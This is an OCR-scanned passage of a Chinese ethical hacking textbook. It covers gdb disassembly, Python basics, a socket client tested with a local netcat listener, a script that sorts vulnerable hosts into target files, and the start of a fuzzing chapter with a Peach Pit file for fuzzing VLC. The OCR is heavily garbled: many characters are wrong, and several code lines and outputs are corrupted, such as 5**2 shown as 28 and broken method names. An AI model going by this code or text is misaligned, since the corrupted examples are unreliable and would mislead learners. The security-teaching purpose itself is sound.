0x804838b «greeting-t47»: add SO0xc,S$esp 
0x804838e <greetingt50>: leave 

0x804838f <greetingt+51>: ret 


End of assembler dump. 

(gdb) set disassembly-flavor intel 

(gdb) disassemble greeting 

Dump of assembler code for function greeting: 
0x804835c «greeting»: push ebp 

0x804835d <greetingt+1>: mov ebp,esp 
0x804835f <greetingt+3>: sub esp, 0x190 
„truncated for brevity... 

End of assembler dump. 


(gdb) quit 
S 
下 面 是 两 个 党 用 命令 : 


info functions 
disassemble /r «function name» 


info fonctions 命 令 显 示 所 有 动态 链接 的 图 数 ， 以 及 所 有 内 部 函 数 (除非 己 将 程序 
删除 )。 使 用 disassemble 函 数 以 及 4 «function name> 选 项 来 输出 操作 码 、 操 作 数 以 及 
指令 。 操 作 码 本 质 上 是 预 汇 编 的 汇编 代码 的 机 项 但 表 示 形 式 。 


2.6 Python 编程 技能 


Python 十 一 门 流行 的 解释 型 、 面 加 对象 的 编程 语言 ， 与 Perl 类 似 。 黑 洛 工 具 ( 以 
及 许多 其 他 应 用 程序 ) 之 所 以 采用 Python 编写 , 是 因为 它 易 学 易 用 , 功能 也 非常 强大 ， 
开 且 Python 具 有 清晰 的 语法 ， 因 而 非常 易于 阅读 。 本 节 只 包含 必须 掌握 的 最 基本 的 
Python 技 能 。 而 几乎 可 以 肯定 的 是 ， 你 应 该 了 解 更 多 关于 Python 的 内 容 ， 可 以 查阅 
众多 优秀 的 Python 专 业 图 书 , 或 者 浏览 www.python.org 网 站 上 的 丰富 文档 ,Python 2.7 
预计 于 2020 年 废止， 但 在 撰写 本 书 时 ， 还 没有 准确 的 正式 废止 日 期 。 多 年 来 ， 很 多 
安全 从 业 人 员 都 认为 , 如 果 想 学 习 Python， 从 而 可 以 使 用 、 修 改 或 扩展 现 有 的 Python 
项 目 ， 那 么 首先 应 当 学 习 Python 2.7。 如 采 你 的 目标 是 开发 Python 新 项 目 ， 则 应 重点 
^K 2]Python 3, Python 3 消除 了 Python 2.7 中 存在 的 很 多 问题 。 目 前 ， 仍 有 大 量程 序 依 
S T Python 2.6 或 Python 2.7， 如 Immunity Security 的 Imnmunity Debugger. 
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2.6.1 获取 Python 


只 需要 从 www.python.org/download/ 下 载 与 操作 系统 对 应 的 Python 版 本 ， 然 后 束 
可 以 跟随 本 书 进行 操作 。 或 者 ， 只 需要 试 着 在 命令 提示 和 从 中 输入 python 即 可 局 动 它 ， 
因为 许多 Linux 发 行 版 和 Mac OS X 10.3 及 更 新 版 本 中 都 已 经 默认 安装 了 Python。 


r.i 


/ ”注意 : 对 于 Mac OS X 用 己 用 言 ， Apple 并 没有 在 其 Python 安装 版 中 包含 很 有 
l SS 用 的 IDLE 集 成 开发 环境 。 可 从 www.python.org/downloadmac/ 获 取 该 工具 。 
或 者 可 选择 在 Xcode 中 编辑 并 尼 动 Python。Xcode 是 Apple 的 集成 开发 环境 ， 
具体 的 操作 方法 请 参见 http:/pythonmac.ore/wiki/XcodeIntesration 。 


由 于 Python 属于 解释 型 而 非 编译 型 语言 ， 因 此 通过 其 交互 式 环境 可 立即 获得 反 
馈 。 在 接 下 来 的 几 节 中 ， 我 们 将 使 用 这 个 交互 式 环境 ， 那 么 现在 就 请 输入 python 
来 启动 它 。 


E 

se 

r "s kj | 
| | 


2.6.2 ”Python 的 “Hello world” 程 序 


对 每 种 语言 的 介绍 总 会 从 经 典 的 “Hello world” 示 例 开始 , 下 面 就 是 其 Python 2.7 
版 本 : 
% python 
. (three lines of text deleted here and in subsequent examples) ... 


>>> print 'Hello, world!' 
Hello, world! 


如 采 想 以 文件 的 方式 学 习 该 例 : 


$ cat > hello.py 

print 'Hello, world!' 

^D # This is simple CTRL+D being pressed to break out 

* python hello.py 

Hello, world! 

从 Python 3 开始 ，print 不 再 是 专用 语句 ， 而 是 一 个 真正 的 函数 。 这 是 一 种 强制 改 
变 , 要 求 像 普 明 函 数 调用 那样 使 用 小 括号 。 下 面 是 Python 3 中 的 “Hello World ”程序 。 

* python 


>>> print("Hello, world!") 
Hello, world! 


26.3 Pythonxi& 


需要 真正 清 厅 理解 的 是 Python 能 使 用 哪些 不 同类 型 的 对 象 来 存放 数据 ， 以 及 如 
何 操作 这 些 数 据 。 我 们 将 介绍 5 大 数据 闫 型 : FA. BU. IR FUR HE. 


39 


40 


PID A "X 
之 后 ， 将 讲解 一 些 基本 语法 和 网 络 编程 基础 知识 。 


2.6.4 FHP 


在 前 面 的 2.6.2 节 中 已 经 用 过 字符 串 对 象 。 在 Python 中 字符 串 用 来 存放 文本 。 下 
例 很 好 地 演示 了 Python 2.7 或 Python 3 中 字符 串 的 使 用 和 操作 是 多 么 简便 : 


$% python 

>>> stringl = 'Dilbert' 

>>> sbring2 = "'Dogbert' 

>>> sbringl + string2 

'DilbertDogbert' 

>>> stringl + " Asok ”二 string2 

'Dilbert Asok Dogbert' 

>>> string3 = stringl + string2 + "Wally" 

>>> string3 

'DilbertDogbertWally' 

>>> string3[2:10] 4 string 3 from index 2 (0-based) to 10 
"lbertDog' 

>>> string3[0] 

1! 

>>> len(string3) 

19 

>>> string3[14:1 # string3 from index 14 (0-based) to end 
'Wally' 

>>> string3[-5:] # Start 5 from the end and print the rest 
'Wally' 

>>> string3.find('Wally') # index (0-based) where string starts 
14 

>>> string3.find('Alice') i -1 if not found 

=F 

>>> string3.replace('Dogbert','Alice') # Replace Dogbert with Alice 
'DilbertAliceWally' 

>>> print('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA') # 30 A's the hard way 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 

>>> print ('A' * 30) # 30 A's the easy way 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 


上 述 这 些 都 是 基本 的 字符 串 操 作 函 数 ， 可 用 来 处 理科 单字 符 串 。 其 语法 简明 直 
观 。 这 里 有 一 个 很 重要 的 特性 , 即 每 一 个 字符 串 ( 程 序 中 名 为 stringl、string2 和 string3) 
都 仅 是 一 个 指针 (对 于 那些 熟悉 C 语 言 的 人 而 言 ), 或 是 一 个 指 同 内 存 中 某 块 数据 的 标 
签 。 有 一 个 概念 有 时 会 让 新 手 犯 错 ， 就 是 指 癌 男 一 个 标签 的 标签 (或 指针 )。 下 面 的 
代码 以 及 图 2-2 演 示 了 这 个 概念 : 


>>> labell = 'Dilbert' 
>>> label? = labell 
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label2 MH | 
Python 字符 串 对 象 
图 2-2 ”两 个 标签 指 问 内 存 中 的 同一 个 字符 串 


此 时 ， 内 存 中 的 某 个 地 方 存 放 关 Python 字符 串 'Dilbert。 还 有 两 个 标签 同时 指向 
这 块 内 存 。 接 下 来 ， 即 使 修改 labell 的 赋值 ，label2 也 并 不 会 改变 : 
. continued from above 
>>> labell = 'Dogbert' 


>>> label? 
"In dberr' 


从 图 2-3 中 可 看 出 ， 修 改 labell 的 赋值 后 ，label2 并 没有 指向 labell， 而 是 依然 指 
问 labell 在 被 重新 赋值 前 所 指 同 的 同一 个 字符 串 。 
Python 字符 串 对 象 


指向 


labell 
label2 


' Dilbert 


EE 


图 2-3 label ik S rH TH 18023 — T AP I) BY EB 


265 数值 


与 Python 字符 串 类 似 ， 数 值 指向 一 个 能 包含 任何 数值 类 型 的 对 象 。 它 能 存放 较 
小 的 数字 、 较 大 的 数字 、 复 数 、 负 数 以 及 任何 你 能 想象 到 的 数值 类 型 。 其 语法 与 预 
期 的 一 样 简单 : 


>>> nl1-5 i Create a Number object with value 5 and label it nl 
>>> n2—3 

>>> nl * n2 

13 

>>> nl ** n2 # nl to the power of n2 (5^3) 

125 

scce HF uL D m d # Divide 5 by 3, then 5 modulus 3 
(1.66666666666606006007, 2) 

# In Python 2.7, the above 5 / 3 calculation would not result in a float 
# without specifying at least one value as a float. 


>>> n3 = 1 # n3 = 0001 (binary) 

>>> n3 << 3 i Shift left three times: 1000 binary - 8 
8 

>>> ) ta * 2 # The order of operations is correct 
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明白 数值 的 工作 原理 后 ， 下 面 加 可 以 开始 组 合 对 象 。 如 采 将 一 个 字符 串 和 一 个 


数字 相 加 ， 会 得 到 什么 结果 ? 


>>> sl 'abc' 
>>> nl 12 
5005 &l + nl 
Traceback (most recent call last): 
File "«stdin»", line 1, in «module» 
TypeError: Can't convert 'int' object to str implicitly 


tH ULE VA 1 我 们 需要 帮助 Python 理解 我 们 硕 望 执 行 什么 操作 。 这 里 ， 能 


将 abc 和 12 组 合 在 一 起 的 唯一 方法 是 将 12 转 换 成 一 个 字符 串 。 我 们 可 动态 地 完成 该 
操作 : 


20 BI + sbrint) 

‘abcl2" 

>>> sl.replacel('c',str(ni)) 
'ab12' 


如 采 上 述 方 法 能 成 功 ， 束 可 将 不 同 的 类 型 组 合 在 一 起 使 用 : 


>>> sl*nl d Display 'abc' 12 times 
'abcabcabcabcabcabcabcabcabcabcabcabc' 


关于 对 象 还 有 一 点 需要 注意 ， 简 单 地 在 对 象 上 进行 操作 并 不 会 改变 该 对 象 。 对 


象 (数值 、 字 符 串 以 及 其 他 闫 型 的 对 象 ) 本 喘 通 前 只 有 在 显 却 地 将 对 象 的 标 釜 ( 指 针 ) 
设置 为 新 值 时 才 会 发 生 改变 ， 如 下 所 示 : 


>>> nl = 5 


>>> nl ** 2 # Display value of 5^2 

28 

>>> ni # nl, however is still set to 5 
5 

>>> nl = nl ** 2 # Set nl = 5^2 

> Hl # Now nl is set to 25 

25 


2.6.6 ”列表 


42 


接 下 来 要 介绍 的 内 置 类 型 是 列表 (Lisb。 可 将 任何 类 型 的 对 象 放 到 列表 中 。 通常， 


在 一 个 或 一 组 对 象 的 前 后 加 上 “[” 和 “]” 就 可 以 创建 列表 。 可 像 字 符 串 那样 对 列 
表 进 行 同 样 灵 活 的 “切片 ”操作 。 所 谓 字 符 串 切片 ， 指 的 是 只 返回 字符 串 对 象 什 的 
一 个 子 集 ， 例 如 ，label1[5:10] 只 返回 第 5 到 第 10 个 值 。 下 面 将 演示 列表 类 型 是 如 何 工 
作 的 : 
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>>> mylist = [1,2,3] 
>>> len (mylist) 


3 

>>> mylist*4 # Display mylist, mylist, mylist, mylist 

Dl. 2 do b Ze d? Tye Be Se dl. 2. 3] 

>>> 1 in mylist # Check for existence of an object 

True 

>>> 4 in mylist 

False 

>>> mylist[1:] # Return slice of list from index 1 and on 
I5. a] 

>>> biglist = [["Dilbert',;, "'Bogbert', 'Catbert'], 

... ['Wally', 'Alice', 'Asok']] # Set up a two-dimensional list 
>>> biglist[1] [0] 

'Wally' 

>>> biglisct [0] [2] 

'Catbert' 

>>> biglist[1] = 'Ratbert' i Replace the second row with 'Ratbert' 


>>> biglist 

[['Dilbert', 'Dogbert', 'Catbert'], "'Ratbert'] 

>>> stacklist = biglist[0] # Set another list = to the first row 
>>> stacklist 

['Dilbert', 'Dogbert', 'Catbert'] 

>>> stacklist = stacklist + ['The Boss'] 

>>> stacklist 

['"Dilbert', 'Dogbert', 'Catbert', "The Boss'] 

>>> stacklist.pop() # Return and remove the last element 
'The Boss' 

>>> stacklist.pop() 

'Catbert' 

>>> stacklist.pop() 

' Dogbert' 

>>> stacklist 

['Dilbert'] 

>>> stacklist.extend(['Alice', 'Carol', 'Tina']) 

>>> stacklist 

['Dilbert', 'Alice', 'Carol', 'Tina'] 

>>> stacklist.reverse() 

>>> stacklist 

['Tina', 'Carol', 'Alice', 'Dilbert'] 

>>> del stacklist[1] i Remove the element at index 1 
>>> stacklist 

['Tina', 'Alice', 'Dilbert'] 


接 下 来 ， 我 们 快速 地 了 解 一 下 字典 类 型 和 文件 类 型 ， 之 后 再 将 这 些 类 型 组 合 在 
一 起 使 用 。 
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2.6.7 pH 


字典 (Dictionary) 与 列表 类 似 ， 二 者 之 国 的 差别 在 于 ， 在 使 用 字典 时 通过 键 (而 不 
是 对 象 索引 ) 来 引用 那些 存放 在 字典 中 的 对 象 。 这 是 一 种 用 于 存储 和 检索 数据 的 极 俐 
便 方 法。 通过 在 键 - 值 (key-value) 对 前 后 加 上 “{” 和 “}” 就 可 创建 字典 ， 如 下 所 示 : 


>>> d = I 'haro* : ‘Dilbert"' } 

>>> 11 "hero |] 

'Dilbert' 

>>> 'hero' in d 

True 

>>> 'Dilbert' in d i Dictionaries are indexed by key, not value 
False 

>>> d.keys () # keys() returns a list of all objects used as keys 
dict keys (['hero']) 

>>> d.values () # values () returns a list of all objects used as values 
dict keys(['Dilbert']) 

>>> d['hero'] = 'Dogbert' 

>>> d 

{'hero': 'Dogbert'} 

>>> d['buddy'] = 'Wally' 

>>>d['pets'] =2 # You can store any type of object, not just strings 
>>> d 

{'hero': 'Dogbert', 'buddy': 'Wally', 'pets': 2} 


2.6.8 TIMER. Ce PETERE n] ERR AEETI, ui 
用 键 来 检索 数据 要 比 使 用 列 m 引 更 有 用 。 


2.6.8 ”Python 文件 操作 


文件 访问 与 其 他 Python 语言 元 系 的 使 用 一 样 容易 .可 打开 (从 而 进行 谈 写 ) 写 入 、 
谈 取 和 关闭 文件 。 Bout 蕉 一 个 示例 ， 把 这 里 讨论 过 的 几 种 不 同 的 数据 类 型 (包括 文 
件 ) 组 合 在 一 起 。 这 个 示例 自 完 假设 存在 一 个 名 为 targets 的 文件 ， 然 后 将 该 文件 的 内 
HDI — IOS DOES: 目标 文件 中 ， 注 意 代 人 码 格式 中 的 绚 进 。 


% cat targets 

RPC-DCOM ID. HH. 1 IO. TIL. ZU. 
SOL-SA-blank-pw 10.10.20.27,10.10.20.28 

i We want to move the contents of targets into two separate files 
* python 

# First, open the file for reading 

>>> targets file = open('targets','r') 

# Read the contents into a list of strings 
>>> lines = targets file.readlines () 

>>> lines 
['RPC-DCOMNt10.10.20.1,10.10.20.4*Mn', 

'" SOL-SA-blank-pwNt10.10.20.27,10.10.20.28^Mn'] 
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i We can also do it with a "with" statement using the following syntax: 
>>> with open("targets", "r") as f: 
^ lines = f.readlines() 


>>> lines 

[ 'RPC-DCOM 10.10.20.1,10.10.20.4\n', 'SQL-SA-blank-pw 

10. 10.2D.2T,10.10.70.27B8X58^, AT 

# The "with" statement automatically ensures that the file is closed 
# and is seen as a more appropriate way of working with files.. 

# Let's organize this into a dictionary 

>>> lines dictionary = {} 


>>> for line in lines: # Notice the trailing : to start a loop 
EINEN one line-line.split () # split() will separate on white space 
— line key = one line[0] 

"ew line value = one line[1] 

aoe lines dictionary[line key] = line value 


— i Note: Next line is blank (<CR> only) to break out of the for loop 


>>> # Now we are back at python prompt with a populated dictionary 
>>> lines dictionary 

L'EPC-DCOM's *10.1B]8.20.1.10.10.2B0.4'. *'SOL-SA-blank-pw': 
"10:-10-20:-27;10-10:20-:-28"} 

# Loop next over the keys and open a new file for each key 

>>> for key in lines dictionary.keys(): 

TE targets string = lines dictionary [key] # value for key 
— targets list = targets string.spluiti',")] # break into list 
wen targets number = len(targets list) 

Tp filename = key + ' ' + str(targets number) + ' targets' 


eg vuln file = open(filename, 'w') 

— for vuln target in targets list: # for each IP in list... 
"T vuln file.write(vuln target + '\n') 

ym vuln file.close{) 

>>> ^D 

$5 ls 

RPC-DCOM 2 targets targets 


SOL-SA-blank-pw 2 targets 

*$ cat SQL-SA-blank-pw 2 targets 
10.10.20.27 

10.10.20.28 

s cat RPC-DCOM 2 targets 
10.10.20.1 

10.10.20.4 


这 个 示例 引入 了 几 个 新 概念 。 首 先 ， 可 看 出 文件 使 用 起 来 非常 方便 。open 函 数 
包含 两 个 参数 。 第 一 个 参数 是 想 要 读 取 或 创建 的 文件 的 名 称 ， 第 二 个 参数 是 访问 类 
型 。 可 打开 该 文件 进行 谈 取 人、 写 入 (w) 或 奶 加 (a)。 在 字母 之 后 添加 + 将 提升 权限 ， 
例如 r+ 导 致 对 文件 的 读 写 访问 。 在 权限 后 添加 b 将 以 二 进 制 模式 打开 。 
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下 面 是 一 个 for 循 环 示例 。for 循 环 的 结构 如 下 所 示 : 


for <iterator-value> in «list-to-iterate-over»: 
# Notice the colon on end of previous line 
# Notice the tab-in 
# Do stuff for each value in the list 


警告 : 在 Python 中 ， 空 白 符 是 有 意义 的 ， 而 缩 进 则 用 来 标记 代码 块 。 大 多 
数 Python 程 序 员 坚持 缩 进 4 个 空格 。 在 整个 代码 块 中 ， 缩 进 量 必 须 一 致 。 

减少 一 级 缩 进 或 者 在 空 行 回 车 ， 将 关闭 循环 。 这 里 并 不 需要 C 语 言 式 的 大 括号 。 
if 语 句 和 while 循 环 也 末 用 类 似 的 结构 。 例 如 : 


1f foo > 3: 
print('Foo greater than 3') 


elif foo == 
print ('Foo equals 3') 
else 
print('Foo not greater than or equal to 3') 


while foo < 10: 
foo = foo + bar 


2.69 ”Python 套 接 字 编程 


本 章 将 讲解 的 最 后 一 个 主题 是 Python 的 套 接 字 对 象 。 为 演示 Python 僚 接 字 ， 下 
面 构建 一 个 简单 的 客户 问 ， 它 连接 到 远程 (或 本 地 ) 主 机 ， 然 后 发 送 “Hello, world”. 
为 测试 这 段 代 码 ， 我 们 需要 一 个 “服务 器 ”来 侦 听 这 个 客户 端的 连接 请 求 。 可 使 用 
下 面 的 语法 ， 将 netcat 侦 听 程 序 绑 定 到 4242 问 口 ， 从 而 模拟 出 服务 亏 ( 可 在 新 窗口 中 
JAZ nc): 


$ nc -l -p 4242 
客户 端 代码 如 下 所 示 : 


import socket 

S = socket.socket (socket.AF INET, socket.SOCK STREAM) 
s.connect(('localhost', 4242) ) 

s.send('Hello, world') # This returns how many bytes were sent 
data = s.recv (1024) 

s.close() 

print ('Received', data) 


相当 简单 吧 ? 需要 记 住 导入 socket 库 ， 在 套 接 字 实 例 化 行 中 有 一 些 套 接 字 选项 
也 需要 记 住 ， 此 外 ， 其 他 部 分 非 党 简单。 连接 到 主机 和 端口 ， 发 送 想 要 的 内 容 ， 使 
用 recv 接 收 数 据 并 保存 到 指定 对 象 ， 然 后 天 闭 套 接 字 。 当 执行 该 代码 时 ， 应 该 会 在 
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netcat 侦 听 程 序 中 看 到 “Hello, world” 消 息 ， 而 在 侦 听 程序 中 输入 的 任何 内 容 都 将 返 
到 客户 问 。 人 至 于 如 何 使 用 Python 语 言及 bind、listen 和 accept 这 些 函 数 来 模拟 netcat 
侦 听 程序 ， 这 里 留 作 练习 。 


2. 本草 小 结 


本 章 简要 介绍 了 编程 概念 和 安全 考虑 事项 。 道 德 黑 客 必须 掌握 足够 多 的 编程 技 
能 以 创建 漏洞 利用 方法 或 审查 源 代 人 码 ;， 当 他 同 工 程 恶意 软件 或 友 据 漏洞 时 ， 要 能 理 
解 汇 编 代码 ; 最 后 ， 同 样 重要 的 是 ， 为 了 能 分 析 恶 意 软 件 运 行 时 的 行为 或 跟踪 
shellcode 在 内 存 中 的 执行 ， 调 试 是 必 备 的 扩 能 。 要 学 会 编程 语言 或 逸 癌 工程 ， 唯 一 
的 途径 是 不 断 练习 ， 让 我 们 从 这 里 局 航 吧 !! 
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S 3:5 下 一 代 模 糊 测 试 


本 章 介 绍 如 何在 软件 测试 及 漏洞 挖掘 中 使 用 模糊 测试 拉 术 。 模 糊 测 试 原 指 一 类 
黑 盒 软 便 件 测试 技术， 其 测试 数据 是 随机 生成 的 。 多 年 来 ， 模 糊 测试 不 断 进 化 ， 并 
引起 研究 人 员 的 广泛 关注 ,其 最 初 的 设计 思想 得 以 延伸 (请 参阅 本 书 在 线 提供 的 “ 扩 
展 阅 读 ”， 了 解 Charlie Miller. Michal Zalewski, Jared DeMott、Gynvael Coldwind 和 
Mateusz Jurczyk 等 安全 专家 的 优秀 兰 作 )。 如 今 模 糊 测 试 工具 文 持 黑 盒 和 日 盒 测 试 方 
法 ， 并 有 具有 很 多 可 调用 参数 。 这 些 参 数 会 影响 模糊 测试 的 过 程 ， 并 可 用 于 对 具体 问 
题 的 测试 过 程 调 优 。 通 过 理解 不 同 的 方法 以 及 对 应 的 参数 ， 将 能 得 到 使 用 模糊 训 试 
技术 所 能 达到 的 最 佳 效果 。 


本 章 涵 盖 以 下 内 容 : 

e 模糊 测试 简介 

e 模糊 测试 器 的 类 型 

e 使 用 Peach 工具 进行 数据 变异 模糊 测试 
e 使 用 Peach 工具 进行 数据 生成 模糊 测试 
e 使 用 AFL 进行 遗传 /进化 模糊 测试 


3.1 模糊 测试 简介 


软件 测试 是 最 快捷 的 漏洞 研究 入 口 之 一 。 传 统 的 黑 盒 软件 测试 对 漏洞 研究 依然 
人 很 有 价值 ， 原 因 古 测试 不 需要 对 软件 内 部 机 制 有 充分 的 了 解 ， 而 仅 需 要 知晓 软件 的 
对 外 接口 ， 生 成 退 过 这 些 接口 传递 的 测试 数据 就 可 以 开始 合 找 漏洞 。 

模糊 测试 技术 是 一 类 随机 生成 测试 数据 的 软 便 件 测试 。 这 种 方式 极 大 简化 了 生 
成 输入 测试 数据 的 难题 ， 并 且 不 需要 了 解 软 件 内 部 的 运作 及 输入 数据 的 结构 。 而 这 
一 貌似 过 于 简单 的 方法 却 被 证 实 可 以 有 效 地 查找 出 软件 中 的 相关 安全 漏洞 ， 并 能 够 
生成 有 用 的 结果 。 

多 年 来 的 大 量 研究 工作 不 断 地 完善 了 软件 测试 和 模糊 测试 拉 术 。 如 分， 模糊 测 
试 不 仅 意 味 看 一 种 使 用 随机 生成 的 数据 作为 输入 的 测试 手段 ， 而 更 多 的 是 摘 述 通过 
多 种 方式 来 验证 输入 的 安全 性 。 

本 章 将 探讨 模糊 测试 的 过 程 ， 并 检验 用 于 改进 模糊 测试 不 同 阶 段 的 各 种 思路 ， 
这 些 思 路 将 有 助 于 友 现 更 多 安全 漏洞 。 
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3.2 ”模糊 测试 器 的 类 型 


如 前 所 述 ， 模 糊 测 试 融 随 看 时 间 推 移 而 不 断 演化 ， 如 今 已 不 再 局 限于 生成 随机 
根据 数据 生成 算法 的 不 同 ， 和 用 模糊 测 弃 厚 可 分 类 如 下 : 

e 效 据 变异 模糊 测试 天 

e ife BOISE UA ds 


3.2.1 数据 变异 模糊 测试 器 


基于 变 寞 的 模糊 测试 费 也 称 为 吗 模 糊 测 试 硕 (Dumb Fuzzer)， 是 最 接近 随机 生成 
输入 数据 这 一 原始 想法 的 最 简单 变 体 。 其 名 称 来 源 是 : 以 随机 方式 改变 (变异 ) 输 入 
数据 。 变 开 后 的 数据 被 用 作 目 标 软 件 的 输入 以 答 试 触 友 软件 朋 温 。 


3.2.2 ”数据 生成 模糊 测试 器 


由 于 需要 预先 了 解 协议 的 内 部 原理 ， 数 据 生成 模糊 测试 器 也 称 为 基于 语法 的 测 
试 或 日 盒 测试 。 这 种 方法 基于 有 效 测 试 需 要 了 解 目标 软件 的 内 部 工作 机 制 这 一 前 提 。 
的 样本 ， 而 是 通过 描述 数据 /协议 结构 的 数据 模型 来 生成 测试 用 例 。 这 些 模 型 通 第 被 
编写 成 配置 文件 ， 其 文件 格式 依赖 于 使 用 它们 的 模糊 测试 工具 。 

数据 生成 模糊 测试 器 的 主要 难点 之 一 在 于 编写 数据 模型 。 对 于 具有 可 用 文档 的 
简单 协议 或 数据 结构 来 说 这 不 是 什么 大 问题 ， 但 这 样 的 情况 很 少 ， 并 且 因 其 过 于 简 
单 而 不 那么 引 人 关 注 。 

在 实际 应 用 中 事情 会 更 为 复杂 ， 即 使 有 可 用 的 技术 规范 和 文档 ， 也 需要 付出 巨 
大 努力 才能 准确 地 转变 为 模糊 测试 的 模型 。 如 果 软 件 公 司 并 没有 遵从 技术 规范 或 对 
此 稍 加 改动 ， 甚 至 引入 规范 中 没有 规定 的 新 功能 ， 事 情 束 会 变 得 更 复 林 。 这 种 情况 
下 ， 需 要 付出 额外 的 努力 来 定制 目标 软件 的 模型 。 

3.2.8 ”遗传 模糊 测试 

XV HEUS WM (Genetic Fuzzing) 也 称 为 进化 模糊 测试 (Evolutionary Fuzzing)， 起 
因 是 需要 随 着 时 间 推移 ， 基 于 “最 大 化 代码 覆盖 范围 ”来 确定 最 佳 的 输入 测试 集 
实际 上 ， 模 糊 测 试问 留意 进入 新 代码 块 的 输入 变异 ， 并 将 这 些 变异 输入 保存 到 测试 
体 (语料库 中。 这样 ， 该 类 模 柳 测 试 工具 可 以 使 用 “ 自 适应 ”的 方式 进行 学 习 ， 术 
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iE "2 遗传 ” 或 “HELL” 模糊 测试 因此 得 名 。 
3.3 Peach fase tei in 


AS Tr E fal Peach ape Ae Mas AAA, Tek AE a, MEF 

Peach 框架 可 在 Windows、Linux 和 Mac OS X 操 作 系 统 中 使 用 。 在 Linux 和 Mac OS 
X 操 作 系 统 中 ， 需 要 使 用 名 为 Mono 的 路 平台 BE Zi f FH 
Windows 10 的 64 位 版 本 。 如 果 使 用 其 他 平台 ， 则 步 又 和 输出 可 能 与 本 章 和 有 人 不同 。 

如 前 所 述 ， 数 据 变 弄 模糊 测试 古 一 个 和 有 趣 的 想法 ， 的 视角 来 说 并 
不 需要 太 大 的 工作 量 。 只 要 选择 一 组 变异 样本 并 输入 到 程序 即 可 开始 模糊 测试 。 

为 使 用 Peach 开 始 模 糊 测 试 ， 需 要 创建 一 个 名 为 Pit 的 文件 。Peach PIFRE 
包含 模糊 测试 会 话 全 部 配置 信息 的 XML 文 档 。 该 配置 文件 所 包含 的 典型 信息 如 下 : 

e 通用 配置 ”定义 了 与 模糊 测试 参数 无 天 的 配置 (如 Python 路 径 )。 

e 数据 模型 (DataModel) ”定义 了 将 通过 Peach 规范 化 语言 的 模糊 化 数据 结构 。 

e 状态 模型 (StateModel) ”定义 了 用 来 正确 表示 协议 的 状态 机 ( 当 一 个 简单 的 数 

据 模 型 不 足以 应 对 所 有 协议 规范 时 )。 

e 代理 (Agent) 与 监测 (Monitor) 定义 了 Peach 分 配 模糊 测试 的 工作 量 以 及 监测 

目标 软件 故障 /漏洞 迹象 的 方式 。 

e 测试 (Test) 配 置 ” 定 义 了 Peach 创 建 每 一 个 测试 用 例 的 方式 以 及 运用 何 种 模 

糊 测 试 策略 来 修改 数据 。 

很 容易 创建 Pit 文 件 自 身 的 变异 ,同时 Peach 提供 了 一 些 可 以 适 配 不 同 的 场景 、 供 
检查 和 修改 的 模板 。Pit 配 置 可 使 用 任何 文本 编辑 项 或 XML 编辑 人 右 进 行 创建 和 修改 。 
推荐 使 用 Microsoft Visual Studio Express 来 编辑 Peach 文档 ， 但 即便 使 用 Notepad++ 
或 Vim 也 已 足够 。 

以 下 就 是 名 为 rm fuzz.xml 的 Peach Pit X: ff: 

<?xml version-"1.0" encoding-"utf-8"?» 

«Peach xmlns-http://peachfuzzer.com/2012/Peach 

xmlns:xsi-http://www.w3.org/2001/XMLSchema-instance 
xsi:schemaLocation-"http://peachfuzzer.com/2012/Peach 

/peach/peach.xsd"» 

<!--Create data model 一 一 > 

o <DataModel name="TheDataModel"> 

<Blob/> 

(2) </DataModel> 

<!-- Create state model 一 一 > 


© «StateModel name-"TheState" initialState="Initial"> 
«State name-"Initial"-» 
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«Action type="output"> 
«DataModel ref-"TheDataModel"/» 
«Data fileName="C:\peach3\rm samples\*.rm" /> 
«/Action» 
«Action type-"close"/» 
«Action type-"call" method-"ScoobySnacks" 
publisher-"Peach.Agent"/» 


</State> 
Q  «/stateModel» 
€«l-- Configure Agent 一 一 > 


(5) «Agent name="TheAgent"> 
<Monitor class="WindowsDebugger"> 
<Param name="CommandLine" value="C:\Program Files 
(x86) \VideoLAN\VLC\vlc.exe fuzzed.rm" /> 
<Param name-"WinDbgPath" value="C:\Program Files 
(x86) \Windows Kits\10\Debuggers\x64" /> 
<Param name-"StartOnCall" value="ScoobySnacks"/> 
</Monitor> 
<Monitor class="PageHeap"> 
<Param name-"Executable" value-"vlc.exe"/» 
<Param name-"WinDbgPath" value="C:\Program Files 
(x86) \Windows Kits\10\Debuggers\x64" /> 
</Monitor> 
Q </Agent> 
(7) «Test name="Default"> 
«Agent ref="TheAgent"/> 
«StateModel ref="TheState"/> 
<!-- Configure a publisher --> 
«Publisher class="File"> 
<Param name-"FileName" value-"fuzzed.rm"/» 
«/Publisher» 
<!--Configure a strategy 一 一 > 
«Strategy class="RandomDeterministic"/> 
«Logger class="File"> 
<Param name-"Path" value-"logs"/» 


«/Logger» 
O </Test> 
</Peach> 
I= pnd 一 一 > 


Pit 文 件 包 含 几 个 将 影响 和 决定 模糊 测试 过 程 的 重要 部 分 。 下 面 将 详 述 这 些 部 
分 ， 并 说 明 它 们 如 何 影 响 前 面 Pit 文 件 的 模糊 测试 过 程 。 

e DataModel(@ 和 @) 定 义 了 将 被 模糊 化 的 数据 结构 。 如 果 面 对 的 是 黑 盒 测试 ， 

那么 其 数据 模型 通 钊 是 未 知 的 ， 并 使 用 单个 < Blob /> 数据 项 来 摘 述 ， 这 表示 

一 个 任意 二 进 制 数据 单元 ， 而 且 对 其 中 的 数据 也 没有 任何 限制 (无 论 对 值 还 是 

顺序 )。 知 省 略 数据 模型 ，Peach 就 不 能 确定 数据 的 类 型 和 大 小 ， 这 将 导致 数 
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据 在 东 种 程度 上 不 能 锌 精确 修改 。 夯 一 方面 ， 省略 数据 模型 可 市 省 模糊 测试 
的 局 动 时 间 。 由 于 设置 黑 盒 模糊 测试 既 便 捷 义 廉价 ， 因 此 值得 从 它 入 手 进而 

e StateModel(@ 和 @) 定 义 了 模糊 测试 中 数据 可 能 经 历 的 各 种 不 同 状态 ,针对 文 
件 格式 的 模 精 测试 ， 其 状态 模型 非常 简单 ,因为 仅 需要 生成 一 个 用 于 测试 的 
文件 。 网 络 协议 的 模糊 测试 就 是 一 个 能 很 好 说 明 状 态 模 型 起 到 关键 作用 的 例 
子 。 为 研究 协议 实现 的 不 同 状态 ， 需 要 正确 遇 有 历 相 应 的 状态 图 。 定 义 状 态 模 
型 可 指导 模糊 测试 禹 如 何 近 历 状 态 图 ， 并 能 测试 更 多 的 代码 和 功能 ， 从 而 所 

